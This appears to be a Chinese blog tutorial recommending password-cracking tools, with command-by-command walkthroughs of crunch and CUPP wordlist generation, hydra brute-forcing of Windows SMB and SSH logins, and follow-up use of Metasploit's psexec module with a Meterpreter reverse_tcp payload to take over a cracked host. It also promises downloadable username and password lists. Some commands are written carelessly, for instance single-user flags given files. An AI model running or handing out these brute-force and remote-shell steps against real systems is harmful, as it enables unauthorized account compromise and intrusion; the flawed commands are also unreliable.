当前位置:网站首页>[附下载]推荐几款暴力破解和字典生成的工具
[附下载]推荐几款暴力破解和字典生成的工具
2022-07-28 08:31:00 【网络安全自修室】
本文主要设计如下内容 1.CUPP(kali) 2.亦思社会工程学学点生成器 3.一句话密码破解工具 4.crunch(kali) 5.hydra(kali)
相关字典和工具可在文末获取百度云下载地址
CUPP(kali)
首先,安装cupp软件
apt install -y cupp

新建一个文件夹,用于保存生成的字典

输入 cupp -i 命令开始编辑生成字典

根据自己已知的信息,生成字典。

查看生成的字典 cat san.txt
亦思社会工程学学点生成器

一句话密码破解工具

crunch(kali)
crunch是kali自带的工具,是一种创建密码字典的工具。按照指定的规则生成密码字典,可以灵活的定制自己的字典文件。
首先,先尝试一个简单的命令。如图所示。1 8表示密码是8位 后面的是密码的范围,我们可以看出按照这种方式输出的字典有23TB。(切记,运行一下立马暂停,否则会卡死)

查看帮助
man crunch > crunch.help
命令格式
crunch <min-len> <max-len> [<charset string>] [options]
参数说明
min-len 设定最小字符串长度(必选)
max-len 设定最大字符串长度(必选)
charset string 字符集
options
-b 指定文件输出的大小,避免字典文件过大
-c 指定文件输出的行数,即包含密码的个数
-d 限制相同元素出现的次数
-e 定义停止字符,即到该字符串就停止生成
-f 调用库文件
特殊字符
% 代表数字
^ 代表特殊符号
@ 代表小写字母
, 代表大写字母
查看库文件
cat /usr/share/crunch/charset.lst
如图所示,前面显示的名称,后面显示的内容是字符集 。这些都是设置好的,我们也可以自定义写一个字符集。

例子1:生成-1-8位密码字典,字符集合为小写字母,从a开始到zzzzzzzz结束
crunch 1 8

例子2:生成1-6位的密码字典,字符集合为[abcdefg],从a开始到gggggg结束
crunch 1 6 abcdefg

例子3:生成指定字符串,比如生日的日期(%代表数字)
crunch 8 8 -t 199307%% -e 19930730

例子4:生成元素的组合,比如123.com
crunch 7 7 -t %%%.com -s 111.com -e 123.com

例子5:在字典中输出特殊字符
crunch 3 3 abc -t @@@ -l @aa

例子6: 以元素组合生成字典[zhangsan|1993|0701]
crunch 4 4 -p zhangsan 1992 0701

例子6:
自定义字符集合
vim /usr/share/crunch/charset.lst
创建自定义字符集合
添加一个字符集 
使用自定义字符集生成[*.com] 字典文件
crunch 5 5 -f /usr/share/crunch/charset.lst test -t @.com

hydra(kali)
首先,先准备两个文件:常用的账号和密码文件。这个是我从github下载的,账号和密码都有几千条。文章最后,我会将文件下载地址分享一下。

windows口令破解
hydra -l ./user.txt -p ./pass.txt smb 192.168.0.110 -vV -f -e nsr
-l 指定一个用户名
-p 指定一个密码
-P 指定密码字典
-L 指定用户名字典
-vV 显示爆破细节
-o 保存爆破结果
-f 找到正确的密码就停止爆破
-e
n null
s same
r 反向
-t 线程
爆破成功后,我们使用msf中的use exploit/windows/smb/psexec模块去链接。
建立payload set payload windows/meterpreter/reverse_tcp

查看需要配置的参数 show options

设置目标主机 set RHOSTS 192.168.0.110
设置账号和密码 set SMBPass xxx set SMBUser xxx
run或者exploit进行连接
linux口令破解
linux口令破解,也分为远程破解与本地破解。远程破解主要是爆破ssh服务,属于在线密码攻击。本地破解需要拿到linux的shadow文件,进行hash值破解,属于离线密码攻击。
破解ssh服务
hydra -l ./user.txt -p ./pass.txt ssh://127.0.0.1-vV -f -t 64
边栏推荐
- 快速上手Flask(一) 认识框架Flask、项目结构、开发环境
- Promise学习笔记
- opencv4.60版本安装和配置
- [592. Fraction addition and subtraction]
- When I use MySQL CDC, there are 100 million pieces of data in the source table. In the full volume phase, when I synchronize 10 million, I stop, and then pass
- This flick SQL timestamp_ Can ltz be used in create DDL
- 推荐一个摆脱变量名纠结的神器和批量修改文件名方法
- [cloud computing] several mistakes that enterprises need to avoid after going to the cloud
- Detailed explanation of DHCP distribution address of routing / layer 3 switch [Huawei ENSP]
- Solution and implementation of APP accelerating reading and displaying IPFs pictures
猜你喜欢

【SwinTransformer源码阅读二】Window Attention和Shifted Window Attention部分

The chess robot pinched the finger of a 7-year-old boy, and the pot of a software testing engineer? I smiled.

The cooperation between starfish OS and metabell is just the beginning

Do you know the five minute rule and the ten byte rule?

MDM data quality application description

Go panic and recover

2022年危险化学品经营单位安全管理人员上岗证题目及答案

TXT text file storage

象棋机器人夹伤7岁男孩手指,软件测试工程师的锅?我笑了。。。

2022高压电工考试模拟100题及模拟考试
随机推荐
2022年安全员-B证考试模拟100题及答案
实现批量数据增强 | keras ImageDataGenerator使用
ES查询索引字段的分词结果
01-TensorFlow计算模型(一)——计算图
Vrrp+mstp configuration details [Huawei ENSP experiment]
训练一个自己的分类 | 【包教包会,数据都准备好了】
Bluetooth technology | it is reported that apple, meta and other manufacturers will promote new wearable devices, and Bluetooth will help the development of intelligent wearable devices
2022高压电工考试模拟100题及模拟考试
Will sqlserver CDC 2.2 generate table locks when extracting large tables from the source
Sentinel
Linux initializes MySQL with fatal error: could not find my-default.cnf
The cooperation between starfish OS and metabell is just the beginning
Starfish Os打造的元宇宙生态,跟MetaBell的合作只是开始
Mysql5.7.38 start keepalived in the container
Argocd Web UI loading is slow? A trick to teach you to solve
js数组去重,id相同对某值相加合并
Map of China province > City > level > District > Town > village 5-level linkage download [2019 and 2021]
Post it notes -- 45 {packaging of the uniapp component picker, for data transmission and processing -- Based on the from custom packaging that will be released later}
Bluetooth technology | the total scale of charging piles in Beijing will reach 700000 in 2025. Talk about the indissoluble relationship between Bluetooth and charging piles
51单片机存储篇:EEPROM(I2C)